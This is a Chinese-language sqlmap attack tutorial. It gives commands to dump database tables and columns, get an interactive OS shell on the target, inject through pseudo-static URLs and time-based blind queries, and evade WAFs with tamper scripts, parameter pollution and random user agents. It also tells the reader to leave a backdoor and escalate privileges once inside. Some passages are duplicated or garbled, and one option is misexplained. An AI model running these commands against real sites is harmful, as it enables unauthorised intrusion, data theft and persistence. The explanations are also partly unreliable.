1.SQLMap注入指定数据库、操作系统 使用获取数据库信息,主要使用的命令包括如下几条:
(1)指定网页的数据库、操作系统 --dbms mysql5.0 --current-db
(2)获取当前库名 --current-db
(3)获取该库中的表名-D “数据库名”--tables
(4)获取该库中的列名-D “列名”-T “表名” --columns
(5)获取该库中的某个列名的字段内容 -D “列名” -T “表名” -C “列名” --dump
2.SQLMap之交互式写shell及命令执行
运行任意操作系统命令 :
执行系统命令(windows系统): --os-cmd
python sqlmap/sqlmap.py -u http://www.any.com/show.php?id=33 --os-cmd=ipconfig
sqlmap 支持模拟 shell 输入,你可以输入任意命令以执行。对应的选项是 --os-shell,并且和 --sql-shell 一样,具备 TAB 补全和记录历史命令的功能。
执行shell: --os-shell
python sqlmap/sqlmap.py -u http://www.any.com/wcms/show.php?id=33 --os-shell
使用获取数据库信息,主要使用的命令包括如下几条:
(1)进行交互式写shell及命令执行 -p id ==> --os-shell
(2)获取当前库名 --current-db
(3)获取该库中的表名-D “数据库名”--tables
(4)获取该库中的列名-D “列名”-T “表名” --columns
(5)获取该库中的某个列名的字段内容 -D “列名” -T “表名” -C “列名” --dump
python sqlmap/sqlmap.py -u http://www.any.com/show.php?id=33 --os-cmd=ipconfigpython sqlmap/sqlmap.py -u http://www.any.com/show.php?id=33 --os-cmd=ipconfig
sqlmap 支持模拟 shell 输入,你可以输入任意命令以执行。对应的选项是 --os-shell,并且和 --sql-shell 一样,具备 TAB 补全和记录历史命令的功能。
进入shell界面 查看是否有管理员权限并留后门提权
3.伪静态一般URL地址格式:
1. http://test.com/php100/id/1/1
2. http://test.com/php100/id/1.html
非伪静态一般URL地址格式:
http://test.com/php100/test.php?id=1
1.python sqlmap.py -u http://www.any.com/lwcms/35*.html --current-db 在sqlmap中伪静态哪儿存在注入点就加*。使用--current-db参数是用于指定当前命令的输出结果是该网站使用的数据库名称。
4.SQLMap之请求延时注入
所谓延时注入主要针对页面无变化,无法用布尔真假判断,无法报错的情况下注入。延时注入是通过页面返回的时间来判断的,不同的mysql数据库版本,延迟注入语句也不同。
mysql >=5.0的可以使用sleep()进行查询;
mysql<5.0的可以使用benchmark()进行查询。
请求延时注入的核心思想:
if(payload,sleep(3),1)
即payload正确时,程序暂停3秒。否则立刻执行。
if(payload,1,sleep(3))
即payload正确时,程序立刻执行,否则暂停3秒。
备注:这里payload是指构造的参数数据。
--technique是用于指定sqlmap注入方式的参数,主要有以下几类:
B: Boolean-based blind SQL injection(布尔型盲注)
E: Error-based SQL injection(报错型注入)
Q:Inline queries injection(内联查询)
U: UNION query SQL injection(联合查询注入)
S: Stacked queries SQL injection(可多语句查询注入/栈查询)
T: Time-based blind SQL injection(基于时间的盲注)
猜数据库
python sqlmap/sqlmap.py -u http://www.any.com/wcms/show.php?id=33 --technique T --time-sec 9 --current-db
(--time-sec参数设定延时时间,默认是5秒)
5. SQLMap之绕过WAF防火墙
1.绕过WAF防火墙的脚本
sqlmap -u {目标URL} --dbs --batch --flush-session --tamper=space2hash.py,modsecurityversioned.py
脚本总类:
apostrophemask.py#用utf8代替引号;
equaltolike.py#MSSQL * SQLite中like 代替等号;
greatest.py#MySQL中绕过过滤’>’ ,用GREATEST替换大于号;
space2hash.py#空格替换为#号 随机字符串 以及换行符;
apostrophenullencode.py#MySQL 4, 5.0 and 5.5,Oracle 10g,PostgreSQL绕过过滤双引号,替换字符和双引号;
halfversionedmorekeywords.py#当数据库为mysql时绕过防火墙,每个关键字之前添加mysql版本评论;
space2morehash.py#MySQL中空格替换为 #号 以及更多随机字符串 换行符;
appendnullbyte.py#Microsoft Access在有效负荷结束位置加载零字节字符编码;
ifnull2ifisnull.py#MySQL,SQLite (possibly),SAP MaxDB绕过对 IFNULL 过滤。 替换类似’IFNULL(A, B)’为’IF(ISNULL(A), B, A)’
space2mssqlblank.py(mssql)#mssql空格替换为其它空符号
base64encode.py#用base64编码
space2mssqlhash.py#mssql查询中替换空格
modsecurityversioned.py#(mysql中过滤空格,包含完整的查询版本注释;
常用脚本:space2morehash.py space2hash.py base64encode.py charencode.py
2. 脚本参数组合策略绕过
以mysql绕过为例,
sqlmap -u {目标URL} --random-agent -v 2 -delay=3.5 --tamper=space2hash.py,modsecurityversioned.py
sqlmap -u {目标URL} --random-agent --hpp --tamper=space2mysqldash.p,versionedmorekeywords.py
--hpp含义是使用 HTTP 参数污染。HTTP 参数污染(HPP)是一种绕过 WAF/IPS/IDS 保护机制(这里有相关介绍)的方法,针对 ASP/IIS 和 ASP.NET/IIS 平台尤其有效。如果你怀疑目标使用了这种保护机制,可以尝试使用此开关以绕过它。
--random-agent 使用随机选定的HTTP User - Agent头
-v #详细的等级(0-6)
0:只显示Python的回溯,错误和关键消息。
1:显示信息和警告消息。
2:显示调试消息。
3:有效载荷注入。
4:显示HTTP请求。
5:显示HTTP响应头。
6:显示HTTP响应页面的内容
--delay 延迟的时间
备注:这些组合策略可以根据注入的反馈信息,及时调整组合策略
--batch:要求不对目标写入
--tamper:使用干预脚本
注意:若不使用3等级无法继续下一步操作。因为WAF可能采用白名单规则,所以对于选择哪种策略,重点是根据-v 3 提示的信息进行判断,可以抓取主流的浏览器的user-agents适当的延时,加上注入字符转换---大小写、空格、字符串、注释、加密等等方式。